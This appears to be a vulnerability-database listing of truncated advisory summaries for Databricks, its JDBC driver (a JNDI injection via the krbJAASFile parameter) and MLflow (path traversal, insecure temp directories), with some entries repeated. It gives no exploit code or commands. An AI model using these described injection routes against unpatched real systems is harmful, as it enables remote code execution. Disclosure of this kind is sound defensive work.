Microsoft Azure Databricks 访问控制错误漏洞

Microsoft Azure Databricks is an open analytics platform from Microsoft Corporation, USA. An access control error vulnerability exists in Microsoft Azure Databricks that stems from improper access control and could lead to elevation of privilege...

GHSA-J5PM-7495-QMR3 vulnerabilities

Vulnerabilities for packages: fulcio-fips, nri-redis, opentofu-fips, gatekeeper-fips, kubelet-csr-approver-fips, opentelemetry-collector, licenseclassifier, yace, kubernetes-dashboard-metrics-scraper, kubernetes, nri-memcached, sonobuoy-fips, flux-helm-controller-fips, cilium-fips, http-echo,...

CVE-2024-49194

Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution RCE by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...

Relative Path Traversal

Overview mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models. Affected versions of this package are vulnerable to Relative Path Traversal in the...

Privilege escalation from writing file into temporary directory to arbitrary code execution

Description The MLFlow temporary directory gets assigned insecure world-writable permissions 0o777. def getorcreatetmpdir: """ Get or create a temporary directory which will be removed once python process exit. """ from mlflow.utils.databricksutils import getreplid, isindatabricksruntime if...

acedeploy (>=2.4.15 <=2.4.115), arreyy (=0.0.1) +87 more potentially affected by CVE-2025-24794 via snowflake-connector-python (>=2.7.12 <=3.13.0)

snowflake-connector-python PYPI version =2.7.12, =2.4.15, =0.4.0, =0.1.3, =0.1.0, =1.13.21, =20230717.1.0, =0.4.0, =1.0.8, =1.0.5, =0.3.1, =1.1.4 - datacontract-cli =0.10.4 - dataligo =0.7.3 and more Source cves: CVE-2025-24794 Source advisory: OSV:PYSEC-2025-27...

The vulnerability of Databricks JDBC driver, related to the lack of measures taken at the control level to clean data, allows attackers to execute arbitrary code.

The vulnerability of Databricks JDBC driver is related to the lack of measures taken at the control level to clean data. Exploiting this vulnerability allows a malicious actor to execute arbitrary code remotely...

Remote Code Execution (RCE)

com.databricks, databricks-jdbc is vulnerable to Remote code execution RCE. The vulnerability is due to insufficient validation or sanitization of the krbJAASFile parameter in the Databricks JDBC Driver, allows the attacker to manipulate the JDBC URL, enabling a JNDI injection that can lead to...

Databricks JDBC Driver Command Injection vulnerability

Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution RCE by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...

io.kestra.plugin:plugin-databricks (>=0.11.0 <=0.17.0), org.finos.legend-community:legend-delta (>=0.1.5 <=0.1.10) +92 more potentially affected by CVE-2024-49194 via com.databricks:databricks-jdbc (>=2.6.25 <=2.6.40-patch-1)

com.databricks:databricks-jdbc MAVEN version =2.6.25, =0.11.0, =0.1.5, =0.0.8, =0.1.1, =4.55.0, =4.55.0, =3.6.1, =3.17.0, =4.7.1, =4.47.0, =4.47.0, =release-4.114.0 - org.finos.legend.engine:legend-engine-pure-runtime-java-extension-shared-function...

CVE-2024-49194

Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution RCE by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...

CVE-2024-49194

Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution RCE by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...

Databricks JDBC Driver 安全漏洞

Databricks JDBC Driver is a driver from Databricks, Inc. A security vulnerability exists in Databricks JDBC Driver versions prior to 2.6.40 that stems from improper handling of the krbJAASFile parameter. An attacker can exploit the vulnerability to remotely execute code...

CVE-2024-49194

Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution RCE by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...

CVE-2024-49194

Databricks JDBC Driver 2.x (prior to 2.6.40) is affected by a JNDI injection vulnerability via the krbJAASFile parameter in a JDBC URL. The issue allows remote code execution in the driver context if a user connects using a crafted URL that includes the krbJAASFile property. Root cause is imprope...

PT-2024-10170 · Databricks · Databricks Jdbc Driver

Name of the Vulnerable Software and Affected Versions: Databricks JDBC Driver versions prior to 2.6.40 Description: The issue is related to the improper handling of the krbJAASFile parameter, allowing a remote attacker to execute arbitrary code by triggering a JNDI injection via a JDBC URL...

com.databricks.labs:automl-toolkit (=0.8.1), ml.combust.mleap:mleap-avro_2.12 (>=0.14.0 <=0.23.0) +14 more potentially affected by CVE-2023-5245 via ml.combust.mleap:mleap-runtime_2.12 (>=0.14.0 <=0.23.0)

ml.combust.mleap:mleap-runtime2.12 MAVEN version =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.19.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.19.0, =0.14.0, =0.17.0, =0.23.0 and more Source cves: CVE-2023-5245 Source advisory: OSV:GHSA-897X-XVJ8-42RQ...

Databricks Platform Cluster Isolation Bypass

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Bypassing cluster isolation through insecure defaults and shared storage product: Databricks Platform vulnerable version: PaaS version as of 2023-01-26 fixed version:...

Security Bulletin: IBM Workload Scheduler potentially affected by a vulnerability found in Json-smart library (CVE-2023-1370)

Summary IBM Workload Scheduler is potentially affected by a vulnerability found in Json-smart library that can cause a stack exhaustion stack overflow and software crash. Specifically, the following plugins can suffer from this issue: Azure Storage Job Executor, Azure Resource Manager Job Executo...

Remote file existence check vulnerability in `mlflow server` and `mlflow ui` CLIs

Impact Users of the MLflow Open Source Project who are hosting the MLflow Model Registry using the mlflow server or mlflow ui commands using an MLflow version older than MLflow 2.2.1 may be vulnerable to a remote file existence check exploit if they are not limiting who can query their server for...